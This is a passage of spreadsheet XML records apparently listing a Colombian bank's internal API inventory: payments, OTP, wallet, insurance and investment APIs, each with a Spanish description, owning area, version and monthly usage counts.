    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ Ecosistema De Pagos_AW1314001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-22T03:10:52"/>
    <s v="Gwe-Payments Wallet"/>
    <n v="110"/>
    <s v="Gwe-Payments - QR Payments"/>
    <n v="110"/>
    <x v="241"/>
    <s v="Permite realizar pagos con código QR en billetera móvil en la App Personas"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="307"/>
    <n v="283"/>
    <n v="9505"/>
    <n v="17756"/>
    <n v="25535"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-04-26T11:37:21"/>
    <s v="Gwe-Payments ALM"/>
    <n v="114"/>
    <s v="Gwe-Payments ALM - Create PIN"/>
    <n v="105"/>
    <x v="242"/>
    <s v="El API permite realizar la generación de un pin para transferencia de dinero entre cuentas de Bancolombia Ahorro a la Mano Para Realizar una transferencia entre cuentas de ALM se debe seguir el siguiente orden: 1. Generar Pin de Pago (Esta API) 2. Enviar el Dinero (Gwe-Payments ALM - Send Money) "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="2622"/>
    <n v="4319"/>
    <n v="10033"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-23T03:36:41"/>
    <s v="Gwe-Payments ALM"/>
    <n v="202"/>
    <s v="Gwe-Payments ALM - Create PIN"/>
    <n v="107"/>
    <x v="242"/>
    <s v="El API permite realizar la generación de un pin para transferencia de dinero entre cuentas de Bancolombia Ahorro a la Mano Para Realizar una transferencia entre cuentas de ALM se debe seguir el siguiente orden: 1. Generar Pin de Pago (Esta API) 2. Enviar el Dinero (Gwe-Payments ALM - Send Money) "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="6075828"/>
    <n v="8275364"/>
    <n v="9872008"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-07-17T15:34:27"/>
    <s v="Gwe-Payments ALM"/>
    <n v="114"/>
    <s v="Gwe-Payments ALM - Financial Agreement Light Query"/>
    <n v="101"/>
    <x v="243"/>
    <s v="El API tiene como objetivo hacer una consulta detallada de un convenio Adhoc, Presenment y REDEBAN"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <n v="3"/>
    <n v="6343"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-23T03:36:41"/>
    <s v="Gwe-Payments ALM"/>
    <n v="202"/>
    <s v="Gwe-Payments ALM - Financial Agreement Light Query"/>
    <n v="102"/>
    <x v="243"/>
    <s v="El API tiene como objetivo hacer una consulta detallada de un convenio Adhoc, Presenment y REDEBAN"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd"/>
    <n v="18102"/>
    <n v="22313"/>
    <n v="503801"/>
    <n v="574539"/>
    <n v="648194"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-07-17T15:34:27"/>
    <s v="Gwe-Payments ALM"/>
    <n v="114"/>
    <s v="Gwe-Payments ALM - Financial Agreement Query"/>
    <n v="101"/>
    <x v="244"/>
    <s v="Esta APi tiene como objetivo consultar y listar los convenios existentes"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="2619"/>
    <n v="4316"/>
    <n v="10029"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-23T03:36:41"/>
    <s v="Gwe-Payments ALM"/>
    <n v="202"/>
    <s v="Gwe-Payments ALM - Financial Agreement Query"/>
    <n v="102"/>
    <x v="244"/>
    <s v="Esta APi tiene como objetivo consultar y listar los convenios existentes"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="152184"/>
    <n v="155153"/>
    <n v="3722015"/>
    <n v="5605308"/>
    <n v="6190936"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-07-26T14:32:23"/>
    <s v="Gwe-Payments ALM"/>
    <n v="114"/>
    <s v="Gwe-Payments ALM - Payment Bill"/>
    <n v="103"/>
    <x v="245"/>
    <s v="El API tiene como objetivo realizar el pago de una factura Adhoc, Presenment y REDEBAN "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <n v="3"/>
    <n v="6345"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-23T03:36:41"/>
    <s v="Gwe-Payments ALM"/>
    <n v="202"/>
    <s v="Gwe-Payments ALM - Payment Bill"/>
    <n v="104"/>
    <x v="245"/>
    <s v="El API tiene como objetivo realizar el pago de una factura Adhoc, Presenment y REDEBAN "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd"/>
    <n v="9049"/>
    <n v="8592"/>
    <n v="152037"/>
    <n v="287411"/>
    <n v="307751"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-04-16T10:21:35"/>
    <s v="Gwe-Payments ALM"/>
    <n v="114"/>
    <s v="Gwe-Payments ALM - Send Money"/>
    <n v="106"/>
    <x v="246"/>
    <s v="Para realizar una transferencia entre cuentas de ALM se debe seguir el siguiente orden:   1. Generar Pin de Pago (Gwe-Payments ALM - Create PIN)   2. Enviar el Dinero (Esta API)"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="2621"/>
    <n v="4313"/>
    <n v="4463"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-23T03:36:41"/>
    <s v="Gwe-Payments ALM"/>
    <n v="202"/>
    <s v="Gwe-Payments ALM - Send Money"/>
    <n v="201"/>
    <x v="246"/>
    <s v="Para realizar una transferencia entre cuentas de ALM se debe seguir el siguiente orden:   1. Generar Pin de Pago (Gwe-Payments ALM - Create PIN)   2. Enviar el Dinero (Esta API)"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="191930"/>
    <n v="204974"/>
    <n v="4214475"/>
    <n v="6780818"/>
    <n v="7608985"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-06-28T15:46:28"/>
    <s v="Gwe-Payments ALM"/>
    <n v="114"/>
    <s v="Gwe-Payments ALM - Send Payment Receipt"/>
    <n v="106"/>
    <x v="247"/>
    <s v="El API permite enviar por correo un comprobante de transferencia de dinero realizada entre cuentas de Bancolombia a La Mano (BLM)"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-23T03:36:41"/>
    <s v="Gwe-Payments ALM"/>
    <n v="202"/>
    <s v="Gwe-Payments ALM - Send Payment Receipt"/>
    <n v="107"/>
    <x v="247"/>
    <s v="El API permite enviar por correo un comprobante de transferencia de dinero realizada entre cuentas de Bancolombia a La Mano (BLM)"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-04-06T01:58:19"/>
    <s v="Gwe-Register"/>
    <n v="120"/>
    <s v="Gwe-Register - Wallet"/>
    <n v="120"/>
    <x v="248"/>
    <s v="Esta API permite realizar las siguientes operaciones: - Registrar billeteras  - Consultar si un usuario ya tiene una billetera registrada."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="13673"/>
    <n v="13128"/>
    <n v="212405"/>
    <n v="367010"/>
    <n v="412860"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-04-06T01:59:16"/>
    <s v="Gwe-RSK Wallet"/>
    <n v="120"/>
    <s v="Gwe-RSK - Wallet"/>
    <n v="120"/>
    <x v="249"/>
    <s v="Esta API permite registrar y revocar llaves para el consumo de las APIs que requieren información privada de usuario en Wallet Server"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="11186"/>
    <n v="10763"/>
    <n v="171282"/>
    <n v="290779"/>
    <n v="329890"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-07-17T15:53:40"/>
    <s v="Gwe-Security ALM"/>
    <n v="1313"/>
    <s v="Gwe-Security ALM - Authentication"/>
    <n v="106"/>
    <x v="250"/>
    <s v="El API permite realizar la autenticación de clientes para la aplicación de Bancolombia a la Mano"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <n v="3"/>
    <n v="6344"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-07-17T15:53:40"/>
    <s v="Gwe-Security ALM"/>
    <n v="1313"/>
    <s v="Gwe-Security ALM - Change Password"/>
    <n v="105"/>
    <x v="251"/>
    <s v="El API permite realizar el cambio de contraseña del cliente de la cuenta de ahorros Bancolombia a La Mano (ALM antes conocido como Ahorro a La Mano)."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="82"/>
    <n v="54"/>
    <n v="1180"/>
    <n v="2028"/>
    <n v="8587"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-07-23T18:03:59"/>
    <s v="Gwe-Security ALM"/>
    <n v="1313"/>
    <s v="Gwe-Security ALM - Collection OTP Generation"/>
    <n v="103"/>
    <x v="252"/>
    <s v="API para la generacion de OTP de recaudos"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="9558"/>
    <n v="8918"/>
    <n v="187478"/>
    <n v="302564"/>
    <n v="347959"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-09-11T09:32:52"/>
    <s v="Gwe-Security ALM"/>
    <n v="1313"/>
    <s v="Gwe-Security ALM - OTP Management"/>
    <n v="107"/>
    <x v="253"/>
    <s v="Esta API permite realizar la generación de OTPs para Bancolombia Ahorro a la Mano, en los casos que se requieran realizar las siguientes solicitudes:   - 061201 -&gt; Vinculación OTP Incial   - 061202 -&gt; Vinculación OTP al celular   - 061801 -&gt; Vinculación Centralizada   - 061501 -&gt; Reexpedición OTP Incial   - 061502 -&gt; Reexpedición OTP cambio de número   - 061601 -&gt; Cambio de correo   - 041301 -&gt; Cambio de clave "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="72963"/>
    <n v="75377"/>
    <n v="1733982"/>
    <n v="2635731"/>
    <n v="2662445"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-07-17T15:53:40"/>
    <s v="Gwe-Security ALM"/>
    <n v="1313"/>
    <s v="Gwe-Security ALM - Set Password"/>
    <n v="107"/>
    <x v="254"/>
    <s v="Esta API tiene como objetivo asignar la contraseña a una cuenta de ahorro Bancolombia Ahorro a la Mano, cuando el cliente ha sido registrado de forma centralizada (Cuando es una cuenta de nómina)."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="15"/>
    <n v="15"/>
    <n v="3265"/>
    <n v="5408"/>
    <n v="5312"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-02-28T09:35:36"/>
    <s v="Gwe-Parameter-Wallet"/>
    <n v="110"/>
    <s v="Gwe-Wallet - Parameter Management"/>
    <n v="110"/>
    <x v="255"/>
    <s v="Este servicio permitirá exponer las diferentes funcionalidades de creación, modificación, consulta y eliminación de los parámetros propios para el canal Billetera."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="414"/>
    <n v="390"/>
    <n v="6921"/>
    <n v="12382"/>
    <n v="16420"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Inscripcion De Facturas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio realiza la inscripción de una factura en el sistema de recaudos, incluyendo consulta de la inscripción de la factura del cliente, modificación a la inscripción de la factura y eliminación de la inscripción de la factura."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="SCI _x000d__x000a_CNB _x000d__x000a_ALM _x000d__x000a_SVP _x000d__x000a_GDE _x000d__x000a_SRC _x000d__x000a_APP _x000d__x000a_PSE _x000d__x000a_SVE _x000d__x000a_ATM _x000d__x000a_AUD _x000d__x000a_FAC _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-04-04T14:29:01"/>
    <s v="Insurance Health"/>
    <n v="100"/>
    <s v="Insurance Health - Issue"/>
    <n v="100"/>
    <x v="256"/>
    <s v="No tiene Descipcion"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="30"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="1"/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-04-04T14:29:01"/>
    <s v="Insurance Health"/>
    <n v="100"/>
    <s v="Insurance Health - Quote"/>
    <n v="100"/>
    <x v="257"/>
    <s v="No tiene Descipcion"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="30"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="2"/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-04-04T15:03:01"/>
    <s v="Insurance Life"/>
    <n v="100"/>
    <s v="Insurance Life - Issue"/>
    <n v="100"/>
    <x v="258"/>
    <s v="Api que genera la expedición de la póliza del seguro solicitado por el cliente. La información que entrega: - ID correspondiente a la expedición de la póliza"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="30"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="7"/>
    <m/>
    <n v="1"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-04-04T15:03:01"/>
    <s v="Insurance Life"/>
    <n v="100"/>
    <s v="Insurance Life - Quote"/>
    <n v="100"/>
    <x v="259"/>
    <s v="Api que ayuda a generar una simulación del seguro solicitado por el cliente.  La información que entrega: - Nombre de la cobertura - Fecha en que se efectíºa la cotización - Valor asegurado por cobertura - Valor de la prima sin IVA - Valor del IVA - Total de la prima con IVA incluido"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="30"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="175"/>
    <n v="56"/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-04-04T10:06:57"/>
    <s v="Insurance Pets"/>
    <n v="100"/>
    <s v="Insurance Pets - Issue"/>
    <n v="100"/>
    <x v="260"/>
    <s v="Api que genera la expedición de la póliza del seguro solicitado por el cliente La información que entrega:  -_x0009_ID correspondiente a la expedición de la póliza"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="30"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-04-04T10:06:57"/>
    <s v="Insurance Pets"/>
    <n v="100"/>
    <s v="Insurance Pets - Quote"/>
    <n v="100"/>
    <x v="261"/>
    <s v="Api que ayuda a generar una simulación del seguro solicitado por el cliente.  La información que entrega:  - nombre de la cobertura -fecha en que se efectíºa la cotización  - valor asegurado por cobertura - valor de la prima sin IVA - valor del IVA - total de la prima con IVA incluido"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="30"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="348"/>
    <n v="108"/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-09-02T22:15:53"/>
    <s v="Insurance Underwriting"/>
    <n v="110"/>
    <s v="Insurance Underwriting - Cash Withdrawals"/>
    <n v="110"/>
    <x v="262"/>
    <s v="API que permite asegurar un retiro de dinero en cajeros como el electrónico, adicionalmente, permite conocer la información de los retiros que han sido asegurados."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="30"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="SeguroDeRetiroEnCajero/V1.0"/>
    <m/>
    <s v="AsegurarRetiro_AW1151001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="12158107"/>
    <n v="11019709"/>
    <n v="10110539"/>
    <n v="10245697"/>
    <n v="11407036"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-09-25T11:45:59"/>
    <s v="Underwriting"/>
    <n v="101"/>
    <s v="Insurance Vehicle"/>
    <n v="101"/>
    <x v="263"/>
    <s v="Esta API tiene capacidades asociadas a la administración de los seguros vehiculares con el corredor de seguro Willis."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <s v=""/>
    <m/>
    <s v="APM_AW1097001"/>
    <n v="2246"/>
    <n v="1721"/>
    <n v="1861"/>
    <n v="1804"/>
    <n v="2007"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-06T02:23:46"/>
    <s v="Underwriting Sufi"/>
    <n v="100"/>
    <s v="Insurance Vehicle"/>
    <n v="100"/>
    <x v="263"/>
    <s v="Esta API tiene capacidades asociadas a la administración de los seguros vehiculares de Sufi."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="WllsWeb_AW1385001"/>
    <n v="2246"/>
    <n v="1721"/>
    <n v="1861"/>
    <n v="1804"/>
    <n v="2007"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-09-07T19:15:47"/>
    <s v="Underwriting Sufi"/>
    <n v="201"/>
    <s v="Insurance Vehicle"/>
    <n v="201"/>
    <x v="263"/>
    <s v="Esta API tiene capacidades asociadas a la administración de los seguros vehiculares de Sufi."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="WllsWeb_AW1385001 _x000d__x000a_ MonitoreoDCM_AAA"/>
    <n v="2246"/>
    <n v="1721"/>
    <n v="1861"/>
    <n v="1804"/>
    <n v="2007"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-09-02T10:20:56"/>
    <s v="Interactive Help"/>
    <n v="101"/>
    <s v="Interactive Help - Frequently Asked Questions"/>
    <n v="101"/>
    <x v="264"/>
    <s v="El servicio de las preguntas frecuentes es un listado de preguntas y respuestas que los clientes hacen de manera recurrente, acerca de diferentes temas o inquietudes del negocio. A través de la API de preguntas frecuentes tenemos las capacidades de Obtener la respuesta de preguntas frecuentes y calificar y comentar una pregunta frecuente."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <m/>
    <s v="Portal Contenidos Bancolombia_AW1218001"/>
    <n v="17617"/>
    <n v="12407"/>
    <n v="13862"/>
    <n v="12495"/>
    <n v="11688"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-27T17:31:07"/>
    <s v="Investment Account"/>
    <n v="122"/>
    <s v="Investment Account - Creation"/>
    <n v="102"/>
    <x v="265"/>
    <s v="La API permite a los consumidores crear cuentas multiproducto de inversión a un cliente en especí­fico en Valores Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="121"/>
    <n v="124"/>
    <n v="58"/>
    <n v="54"/>
    <n v="58"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-01-13T18:07:28"/>
    <s v="Investment Account"/>
    <n v="122"/>
    <s v="Investment Account - Information"/>
    <n v="101"/>
    <x v="266"/>
    <s v="La API permitirá a los consumidores consultar las cuentas de inversión asociadas a un cliente especí­fico en Valores Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v=""/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="6897"/>
    <n v="5840"/>
    <n v="4722"/>
    <n v="4591"/>
    <n v="4572"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-27T17:31:07"/>
    <s v="Investment Account"/>
    <n v="122"/>
    <s v="Investment Account - Management"/>
    <n v="102"/>
    <x v="267"/>
    <s v="Permite realizar la gestión administrativa de las Cuentas de Inversión en Valores Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-27T17:31:07"/>
    <s v="Investment Account"/>
    <n v="122"/>
    <s v="Investment Account - Transfer"/>
    <n v="103"/>
    <x v="268"/>
    <s v="permite realizar transferencias desde y hacia Cuentas Multiproducto de Inversión de Valores Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="1710"/>
    <n v="4274"/>
    <n v="2877"/>
    <n v="3191"/>
    <n v="2013"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-23T09:17:40"/>
    <s v="Investment Channel"/>
    <n v="100"/>
    <s v="Investment channel  - customer"/>
    <n v="100"/>
    <x v="269"/>
